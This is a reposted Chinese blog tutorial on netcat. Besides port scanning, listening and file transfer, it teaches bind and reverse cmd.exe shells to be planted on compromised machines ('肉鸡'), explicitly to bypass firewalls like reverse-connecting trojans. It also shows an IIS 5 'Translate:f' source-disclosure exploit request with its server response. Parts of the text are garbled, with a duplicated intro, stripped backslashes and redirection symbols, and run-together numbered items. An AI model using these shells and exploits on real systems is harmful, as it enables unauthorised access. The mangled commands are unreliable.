nc命令详解 | |
| |
来源: ChinaUnix博客 日期: 2008.10.14 09:27 (共有0条评论) 我要评论 | |
nc命令详解 2007-6-17 15:36 来源: Linuxshell社区门户 netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧…… 一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具, 能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几 乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。 nc命令详解 Filed under: security — ranbo @ 9:08 pm netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧…… 一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具, 能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几 乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。 在中国,它的WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一个是由‘红与黑’编译 后的新‘浓缩’版。‘浓缩’版的主程序只有10多KB(10多KB的NC是不能完成下面所说的第4、第5种使用方法, 有此功能的原版NC好象要60KB:P),虽然”体积”小,但很完成很多工作。 一、基本使用 想要连接到某处: nc [-options] hostname port[s] [ports] … 绑定端口等待连接: nc -l -p port [-options] [hostname] [port] 参数: -e prog 程序重定向,一旦连接,就执行 [危险!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, … -h 帮助信息 -i secs 延时的间隔 -l 监听模式,用于入站连接 -n 指定数字的IP地址,不能用hostname -o file 记录16进制的传输 -p port 本地端口号 -r 任意指定本地及远程端口 -s addr 本地源地址 -u UDP模式 -v 详细输出——用两个-v可得到更详细的内容 -w secs timeout的时间 -z 将输入输出关掉——用于扫描时 其中端口号可以指定一个或者用lo-hi式的指定范围。 例如:扫描端口 tcp扫描 C:nc>nc -v -z -w2 192.168.0.80 1-140 net [192.168.0.80] 140 (?) net [192.168.0.80] 139 (netbios-ssn) open net [192.168.0.80] 138 (?) net [192.168.0.80] 137 (netbios-ns) net [192.168.0.80] 136 (?) net [192.168.0.80] 135 (epmap) open net [192.168.0.80] 81 (?) open net [192.168.0.80] 80 (http) open net [192.168.0.80] 79 (finger) net [192.168.0.80] 25 (smtp) open net [192.168.0.80] 24 (?) net [192.168.0.80] 23 (telnet) net [192.168.0.80] 21 (ftp) udp扫描 C:nc>nc -u -v -z -w2 192.168.0.80 1-140 net [192.168.0.80] 140 (?) open net [192.168.0.80] 139 (?) open net [192.168.0.80] 138 (netbios-dgm) open net [192.168.0.80] 137 (netbios-ns) open net [192.168.0.80] 54 (?) open net [192.168.0.80] 53 (domain) open net [192.168.0.80] 38 (?) open net [192.168.0.80] 37 (time) open net [192.168.0.80] 7 (echo) open 二、高级应用 1.IE的MIME欺骗 这个网站目录提供了黑客的n关,过了这n关证明你开始入门了。我做的 http://www.try2hack.nl 的国产版。 这个页面告诉我们的浏览器不是 IE6.72,我们的*作系统不是LIUNX,我们不是从 www.microsoft.com/ms.htm 重定向链接过去的,linux有 IE6.72? 微软会在它的页面上放 http://www.try2hack.nl/cgi-bin/level7.pl 的链接? nc 221.10.222.34 80 GET /level/level7.php HTTP/1.1 Accept:image/gif,image/x-xbitmap,application/msword,*/* Referer:http://www.microsoft.com/ms.htm Accept-Language:zh-cn Accept-Encodeing:gzip,deflate User-Agent:Mozilla/4.0 (compatible;MSIE6.72;Linux i686) Host:221.10.222.34 Connection:Keep-Alive 2.IIS 5 “Translate:f” 显示代码脆弱点 Translate:f脆弱点的机制:发送一个畸形的HTTP GET 请求给服务器方一个可执行脚本或相关文件类型(例如.ASP或者global.asa)。这些文件是用于服务器上运行的,绝不会到客户机上去,而这个请求就会导致IIS将这种文件的内容发送到远端的客户机上,而不是在服务器上运行。这种畸形的HTTP GET请求的关键特性是该请求的末尾有一个特定的头信息Translate:f,并有一个反斜杠””附于URL之后。下面就有这样的一个例子([CRLF]代表回车字符) 注意 GET global.asa 后的反斜杠以及Translate:f头信息。 GET /global.asa HTTP/1.0 Host:192.168.0.1 User-Agent:SensePostData Content-Type:application/x-www-form-urlencoded Translate:f [CRLF] [CRLF] 将以上内容保存在一个文本文件中(例如example.txt) 然后向一个有这个漏洞的服务器发送 c:>type example.txt | nc –nvv 192.168.0.80 80 (UNKNOWN) [192.168.0.80] 80 (?) open HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 03 Dec 2002 08:50:46 GMT Content-Type: application/octet-stream Content-Length: 2790 ETag: “0448299fcd6df1:bea” Last-Modified: Wed, 13 Nov 2002 18:50:46 GMT Accept-Ranges: bytes Cache-Control: no-cache 举例: 1)连接到REMOTE主机,例子: 格式:nc -nvv 192.168.x.x 80 讲解:连到192.168.x.x的TCP80端口 2)监听LOCAL主机,例子: 格式:nc -l -p 80 讲解:监听本机的TCP80端口 3)扫描远程主机,例子: 格式:nc -nvv -w2 -z 192.168.x.x 80-445 讲解:扫描192.168.x.x的TCP80到TCP445的所有端口 4)REMOTE主机绑定SHELL,例子: 格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe 讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口 5)REMOTE主机绑定SHELL并反向连接,例子: 格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354 讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口 以上为最基本的几种用法(其实NC的用法还有很多, 当配合管道命令”|”与重定向命令”“等等命令功能更强大……)。 ===================================================================================================== 高级用法: 6)作攻击程序用,例子: 格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x 80 格式2:nc -nvv 192.168.x.x 80 c:log.txt 讲解:使用’-L’可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到’c:log.txt’中,如果把‘>’ 改为‘>>’即可以追加日志 附:’c:log.txt’为日志等 9)作蜜罐用[3],例子: 格式1:nc -L -p 80 e:log.dat nc -l -v -p port 参数解释: -l:监听端口,监听入站信息 -p:后跟本地端口号 -v:显示端口的信息,如果使用-vv的话,则会显示端口更详细的信息 提示:一般大家都爱用-vv nc -l -p 80 这个很简单,监听80端口 如果机器上运行这个命令,端口80被认为是开放的,可以欺骗很多扫描器的哦! nc -l -p 80 > e:log.dat 呵呵,功能和上边一样,但是后边加了个“> e:log.dat”我想,学过ECHO 那个命令的人都会知道吧,是在E盘创建一个log.dat的日志文件 nc -l -v -p 80 和上边命令相似,不过这次不是记录在文件里,而是会直接显示在运行着NC 的屏幕上。 呵呵,讲了这么多,来实践下 nc -l -v -p 80 然后在浏览器中输入本机IP:127.0.0.1 呵呵,看到什么? 同样,上边两个也是一样,大家自己试验一下吧 命令2:程序定向 nc -l -p port -t -e cmd.exe 本地机: nc -l -p port 或 nc -l -v -p port 目标机:nc -e cmd.exe ip port 参数解释: -l、-p两个参数已经解释过了 -e;作用就是程序定向 -t:以telnet的形式来应答 例子 nc -l -p 5277 -t -e cmd.exe 知道运行在哪里吗?千万不要运行在自己的机器上,如果运行了,你机器 就会变成一台TELNET的服务器了,呵呵,解释一下:监听本地端口5277的 入站信息,同时将CMD.exe这个程序,重定向到端口5277上,当有人连接的时候,就让程序CMD.exe以TELNET的形式来响应连接要求。 说白了,其实就是让他成为一台TELNET的肉鸡,所以这个命令要运行在你的肉鸡上。。(话外音:说这么多遍当我们白痴啊,快往下讲!!!) 呵呵,咱们来找台肉鸡试试,我TELNET IP 5277 HOHO~~如何? local machine:nc -l -p port ( or nc -l -v -p port ) remote machine:nc -e cmd.exe ip port 大家知道灰鸽子和神偷吧,这两款工具都是利用了反弹端口型的木马, 什么叫反弹端口?就是说,当对方中马后,不用你主动和对方连接,也就是说 不用从你的client端向对方主机上运行的server端发送请求连接,而是对方主动来连接你 这样就可以使很多防火墙失效,因为很多防火墙都不检查出站请求的。 这里这两个命令结合在一起后,于那两款木马可以说有异曲同工之效。为什么? 咳!!听我给你讲啊!!(先交100000000RMB学费)哇,别杀我啊!!) nc -l -p 5277 (坚听本地5277端口) 同样也可以用 nc -l -v -p 5277 运行在本地 然后在远程机器上,想办法运行 nc -e cmd.exe ip 5277 (你可别真的打“ip”在肉机上啊)要打,xxx.xxx.xxx.xxx这样!! 呵呵,看看在本地机器上出现了什么? 这样就是反弹~~在本地机器上得到了一个SHELL 命令3:扫描端口 nc -v ip port nc -v -z ip port-port nc -v -z -u ip port-port 参数解释: -z:将输入输出关掉,在扫描时使用 nc -v ip port 这个命令是针对某一个端口进行扫描 例如: nc -v ip 135 扫描远程主机的135端口,这样获得了该端口的一些简单信息,但是针对某些端口,我们还可以获得更多的信息 例如:80端口 我们可以使用nc -v ip 80 然后使用get方法来获得对方的WEB服务器的信息 nc -v -z ip port-port 这个命令是用来扫描的一个命令,这个命令用于快速扫描TCP端口,而port-port则是指定了扫描的端口范围 例如: nc -v -z ip 1-200 可以看到我机器上的1-200的TCP端口的开放情况 nc -v -z -u ip port-port 这个命令比上个命令多了个-u,这个命令的作用仍然是扫描端口,只是多了一个-u的参数,是用来扫UDP端口的 例如: nc -v -z -u ip 1-200 这个命令就会扫1-200的UDP端口 命令4:传送文件(HOHO,I LIKE) LOCAL MACHINE:nc -v -n ip port y:svr.exe 参数解释: -n:指定数字的IP地址 这两个命令结合起来是用来传送文件的 首先,在远程机上运行命令: nc -v -l -p 5277 > c:pulist.exe 这个命令还记的吗?呵呵,是不是和监听命令有点类似,对,没错,这个是监听5277端口 并把接受到的信息数据写到c:pulist.exe中 这时候在本地机上运行 nc -v -n ip 5277 |
nc命令详解 转 http://linux.chinaunix.net/techdoc/system/2008/10/14/1038114.shtml
最新推荐文章于 2022-06-01 08:43:41 发布